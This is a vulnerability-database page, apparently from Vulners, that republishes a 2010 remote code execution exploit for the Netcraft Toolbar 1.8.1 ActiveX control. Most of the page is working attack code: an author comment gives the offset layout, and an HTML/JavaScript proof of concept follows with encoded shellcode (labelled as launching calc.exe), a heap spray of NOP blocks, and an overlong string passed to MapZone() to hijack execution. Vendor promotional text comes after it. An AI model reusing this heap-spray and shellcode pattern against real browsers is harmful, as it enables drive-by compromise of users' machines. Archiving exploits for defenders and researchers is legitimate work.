Vulners
Lucene search
Netcraft Toolbar 1.8.1 Remote Code Execution Exploit
====================================================
Netcraft Toolbar 1.8.1 Remote Code Execution Exploit
====================================================
<!--
Title: Netcraft Toolbar 1.8.1 Remote Code Execution Exploit
Date: Nov 23, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://toolbar.netcraft.com/install/Netcraft%20Toolbar.msi
Version: 1.8.1
Tested on: WinXP - IE 6
CVE: NA (0day)
This object is NOT marked safe for scripting so the impact of this issue is small. You'll have to
enable loading of unsafe ActiveX controls to be able to test it.
There is a classic buffer overflow in "%PROGRAMFILES%\Netcraft Toolbar\retrievepage.dll".
By supplying an overly long string to the MapZone() function we can blah blah blah... this
has been covered 10000000 times. Our offset is... [75 junk bytes][ebp][eip]. l33th4x iknowright.
NOTE:
This issue appears to get patched silently after the Netcraft Toolbar loads up in IE. retrievepage.dll
gets replaced however curiously, both the old and new dlls have the SAME version number (1.0.1.0), and
there is no indication an update has occured. Maybe Netcraft is trying to hide the vulnerability?
I dont know. The vulnerable dll is 180KB whereas the patched one is 172KB. Meh, just fyi. Make sure
it's loading the 180KB one when testing.
much love to irc.rizon.net#beer
PS:
Any Information Security firms looking for a knowledgeable, motivated intern?
I sure would love to talk to you.
-->
<object classid='clsid:73F57628-B458-11D4-9673-00A0D212FC63' id='target' /></object>
<script>
// runs calc.exe
var shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
var nops = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(nops.length < slackspace) {
nops += nops;
}
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while((block.length + slackspace) < 0x50000) {
block = block + block + fillblock;
}
// Do a little dance...
memory=new Array();
for(counter=0; counter<200; counter++){
memory[counter] = block + shellcode;
}
// Make a little love...
var pwnt = "";
while(pwnt.length <= 83){
pwnt += "\x0c";
}
// Get down tonight!
document.getElementById('target').MapZone( pwnt );
</script>
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Nov 2010 00:00Current
7.1High risk
Vulners AI Score7.1